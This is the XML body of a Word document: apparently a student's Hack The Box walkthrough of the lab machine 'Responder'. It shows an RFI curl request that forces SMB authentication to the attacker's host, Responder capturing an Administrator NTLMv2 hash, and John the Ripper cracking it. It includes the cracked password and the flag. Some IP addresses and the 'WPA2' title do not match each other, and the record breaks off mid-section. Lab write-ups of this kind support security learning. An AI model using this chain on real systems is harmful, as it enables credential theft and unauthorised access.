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center"/>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:hAnsi="Liberation Serif"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>RESPONDER – HACK THE BOX</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">WPA2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve"> HASH CAPTURE &amp; CRACKING</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val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BodyText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BodyText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BRIAN MWANGI KIBINGE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText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2ND OCTOBER 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText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KALI LINUX | HACK THE BOX</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText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━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"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A complete walkthrough of the Responder machine —</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"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from RFI exploitation to flag capture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"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BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"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          </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Documented in: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">       LibreOffice Writer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"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Operating System:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">     Kali Linux</w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="0" w:start="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>1. EXECUTIVE SUMMARY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText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The Responder machine on Hack The Box is a "Very Easy"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Windows target that demonstrates the dangers of Remote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File Inclusion (RFI) vulnerabilities and NTLM hash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capture.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This walkthrough documents the complete attack chain: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Exploiting an RFI vulnerability to force SMB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authentication to an attacker-controlled server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Capturing NTLMv2 hashes using Responder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Cracking the hash with John the Ripper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Gaining remote access to the target via WinRM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Retrieving the flag from the Administrator account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rFonts w:ascii="Monospace" w:hAnsi="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="808080" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Monospace" w:hAnsi="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:fill="808080" w:val="clear"/>
        </w:rPr>
        <w:t>Final Flag: ea81b7afddd03efaa0945333ed147fac</w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="0" w:start="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>2. TOOLS USED</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText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Environment: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Attacker:    Kali Linux (bare metal)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Target:      Windows Server (Hack The Box)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="6873" w:type="dxa"/>
        <w:jc w:val="start"/>
        <w:tblInd w:w="-1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277"/>
        <w:gridCol w:w="4596"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="22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45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>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2277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OpenVPN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="459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Connect to HTB network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2277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Responder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="459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Capture NTLM hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2277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John the Ripper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="459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Crack NTLMv2 hashes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2277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Evil-WinRM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="459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Remote Windows management</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2277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curl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="459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Trigger RFI vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2277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nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="459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Port scanning and enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Definitions:</w:t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• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RFI (Remote File Inclusion): A web vulnerability that allows an attacker to include a file from a remote server into the target application. Often leads to code execution or forced authentication.</w:t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• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NTLM (NT LAN Manager): A Microsoft authentication protocol used in Windows networks. It sends challenge-response hashes instead of plain passwords.</w:t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• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NTLMv2: The second version of NTLM, more secure than the original. Still vulnerable to relay and capture attacks.</w:t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• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SMB (Server Message Block): A network file-sharing protocol used by Windows. Runs on TCP port 445.</w:t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• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hash: A one-way cryptographic representation of a password. Cannot be reversed, but can be cracked using wordlists or brute force.</w:t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• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WinRM (Windows Remote Management): A Microsoft protocol for remotely managing Windows systems. Runs on TCP port 5985 (HTTP) and 5986 (HTTPS).</w:t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• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Responder: A tool that poisons LLMNR, NBT-NS, and MDNS queries to capture NTLM hashes on a network.</w:t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• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>John the Ripper: A popular password-cracking tool that supports many hash formats including NTLMv2.</w:t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• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Evil-WinRM: A tool for connecting to Windows machines via WinRM, providing a PowerShell-like shell.</w:t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• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>LLMNR (Link-Local Multicast Name Resolution): A Windows protocol for name resolution. Can be poisoned to redirect traffic.</w:t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• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NBT-NS (NetBIOS Name Service): A legacy Windows name resolution protocol. Also vulnerable to poisoning.</w:t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2"/>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="0" w:start="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>3. METHODOLOGY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText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Heading3"/>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="0" w:start="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>3.1 VPN Connection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 connected my Kali Linux machine to the Hack The Box "Machines" network using OpenVPN. This put me on the same network as the target machine (10.129.106.23).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Command used:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
        <w:t>sudo openvpn machines_us-4.ovpn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Verified the VPN connection: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color w:val="000000"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
        <w:t>ip a | grep tun0</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
        <w:t>inet 10.10.14.61/23 scope global tun0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  <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="5038090" cy="2197735"/>
                <wp:effectExtent l="0" t="0" r="0" b="0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090" cy="21977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star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5038090" cy="1974850"/>
                                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                  <wp:docPr id="2" name="Image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38090" cy="1974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 VPN connection established with IP 10.10.14.61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396.7pt;height:173.05pt;mso-wrap-distance-left:0pt;mso-wrap-distance-right:0pt;mso-wrap-distance-top:0pt;mso-wrap-distance-bottom:0pt;margin-top:-173.0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star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5038090" cy="1974850"/>
                            <wp:effectExtent l="0" t="0" r="0" b="0"/>
                            <wp:docPr id="3" name="Image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38090" cy="1974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sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                        <w:t>: VPN connection established with IP 10.10.14.61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3"/>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="0" w:start="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>3.2 Target Reconnaissance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Before attacking the target, I verified it was reachable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on the network.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Target IP: 10.129.106.23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Command used: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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
        <w:t>ping -c 4 10.129.106.23</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:fill="808080" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:fill="808080" w:val="clear"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Result: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 w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
        <w:t>4 packets transmitted, 4 received, 0% packet loss</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
      </w:r>
      <w:r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381625" cy="2575560"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="largest"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25755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star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5381625" cy="2352675"/>
                                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                  <wp:docPr id="5" name="Image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81625" cy="2352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 Target is reachable with 0% packet loss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23.75pt;height:202.8pt;mso-wrap-distance-left:0pt;mso-wrap-distance-right:0pt;mso-wrap-distance-top:0pt;mso-wrap-distance-bottom:0pt;margin-top:0pt;mso-position-vertical:top;mso-position-vertical-relative:text;margin-left:37.45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star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5381625" cy="2352675"/>
                            <wp:effectExtent l="0" t="0" r="0" b="0"/>
                            <wp:docPr id="6" name="Image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81625" cy="2352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sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                        <w:t>: Target is reachable with 0% packet loss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  <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="0" w:start="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>3.3 Hosts File Configuration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web service on the target redirects to the domain "unika.htb". To access it properly, I added this domain to my local hosts file.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Command used:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
        <w:t>echo "10.129.106.23 unika.htb" | sudo tee -a /etc/hosts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Result:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
        <w:t>10.129.106.23 unika.htb</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="283"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
      </w:r>
      <w:r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962525" cy="1642110"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="largest"/>
                <wp:docPr id="7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2525" cy="16421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star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4962525" cy="1419225"/>
                                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                  <wp:docPr id="8" name="Image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62525" cy="1419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 Adding unika.htb to /etc/hosts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90.75pt;height:129.3pt;mso-wrap-distance-left:0pt;mso-wrap-distance-right:0pt;mso-wrap-distance-top:0pt;mso-wrap-distance-bottom:0pt;margin-top:0pt;mso-position-vertical:top;mso-position-vertical-relative:text;margin-left:53.95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star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4962525" cy="1419225"/>
                            <wp:effectExtent l="0" t="0" r="0" b="0"/>
                            <wp:docPr id="9" name="Image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62525" cy="1419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sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                        <w:t>3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sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                        <w:t>: Adding unika.htb to /etc/hosts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  <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="0" w:start="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>3.4 Responder Setup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Responder is a tool that poisons LLMNR, NBT-NS, and MDNS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queries to capture NTLM hashes. I started it on the VPN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interface to listen for authentication attempts from the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target.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Command used:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:shd w:fill="B2B2B2" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:fill="B2B2B2" w:val="clear"/>
        </w:rPr>
        <w:t>sudo responder -I tun0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="start"/>
        <w:rPr>
          <w:shd w:fill="B2B2B2" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:fill="B2B2B2" w:val="clear"/>
        </w:rPr>
      </w:r>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="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276850" cy="5347335"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="largest"/>
                <wp:docPr id="10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0" cy="53473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star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5276850" cy="5124450"/>
                                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                  <wp:docPr id="11" name="Image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76850" cy="5124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 Responder listening on tun0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15.5pt;height:421.05pt;mso-wrap-distance-left:0pt;mso-wrap-distance-right:0pt;mso-wrap-distance-top:0pt;mso-wrap-distance-bottom:0pt;margin-top:0pt;mso-position-vertical:top;mso-position-vertical-relative:text;margin-left:41.55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star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5276850" cy="5124450"/>
                            <wp:effectExtent l="0" t="0" r="0" b="0"/>
                            <wp:docPr id="12" name="Image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76850" cy="5124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sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                        <w:t>: Responder listening on tun0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3"/>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="0" w:start="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>3.5 RFI Exploitation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index.php page has a vulnerable "page" parameter that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allows Remote File Inclusion (RFI). By setting this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parameter to a UNC path pointing at my machine, I forced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target to authenticate to my SMB server.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Command used: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>
          <w:color w:val="000000"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
        <w:t>curl "http://unika.htb/index.php?page=//10.10.14.179/test.txt"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Result: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 xml:space="preserve">Warning: include(\\10.10.14.179\TEST.TXT): Failed to open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stream: No such file or directory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s">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="10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332220" cy="1281430"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="largest"/>
                <wp:docPr id="13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220" cy="128143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star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6332220" cy="1058545"/>
                                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                  <wp:docPr id="14" name="Image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32220" cy="10585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 RFI trigger causing SMB connection attempt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98.6pt;height:100.9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star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6332220" cy="1058545"/>
                            <wp:effectExtent l="0" t="0" r="0" b="0"/>
                            <wp:docPr id="15" name="Image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32220" cy="10585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sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                        <w:t>5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sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                        <w:t>: RFI trigger causing SMB connection attempt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3"/>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="0" w:start="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>3.6 NTLM Hash Capture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Responder successfully captured the NTLMv2 hash of the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Administrator account from the target machine.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Captured hash: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[SMB] NTLMv2-SSP Client   : 10.129.113.211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[SMB] NTLMv2-SSP Username : RESPONDER\Administrator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[SMB] NTLMv2-SSP Hash     : Administrator::RESPONDER:98f6f4cd...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                                                              </w:t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br w:type="page"/>
      </w:r>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="1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332220" cy="2073275"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="largest"/>
                <wp:docPr id="1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220" cy="20732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star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98.6pt;height:163.2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star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inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="6332220" cy="1997075"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="1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220" cy="19970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star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6332220" cy="1774190"/>
                                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                  <wp:docPr id="18" name="Image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Image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32220" cy="17741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 NTLMv2 hash captured by Responder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inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:rect style="position:absolute;rotation:-0;width:498.6pt;height:157.25pt;mso-wrap-distance-left:0pt;mso-wrap-distance-right:0pt;mso-wrap-distance-top:0pt;mso-wrap-distance-bottom:0pt;margin-top:-157.2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star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6332220" cy="1774190"/>
                            <wp:effectExtent l="0" t="0" r="0" b="0"/>
                            <wp:docPr id="19" name="Image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Image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32220" cy="1774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sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                        <w:t>6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sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                        <w:t>: NTLMv2 hash captured by Responder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3"/>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="0" w:start="0"/>
        <w:jc w:val="start"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>3.7 Password Cracking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 saved the captured hash to a file and used John the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Ripper with the rockyou.txt wordlist to crack it.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Command used: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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
        <w:t>john --format=netntlmv2 hash.txt --wordlist=/usr/share/wordlists/rockyou.txt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Result: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>
          <w:color w:val="000000"/>
          <w:shd w:fill="999999" w:val="clear"/>
        </w:rPr>
        <w:t>badminton    (Administrator)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</w:t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br w:type="page"/>
      </w:r>
      <w:r>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15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332220" cy="1604645"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="largest"/>
                <wp:docPr id="20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220" cy="16046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star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6332220" cy="1381760"/>
                                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                  <wp:docPr id="21" name="Image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Image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32220" cy="1381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 Password cracked: badminton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98.6pt;height:126.3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star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6332220" cy="1381760"/>
                            <wp:effectExtent l="0" t="0" r="0" b="0"/>
                            <wp:docPr id="22" name="Image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Image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32220" cy="1381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sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                        <w:t>7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sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                        <w:t>: Password cracked: badminton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3"/>
        <w:bidi w:val="0"/>
        <w:ind w:hanging="0" w:start="0"/>
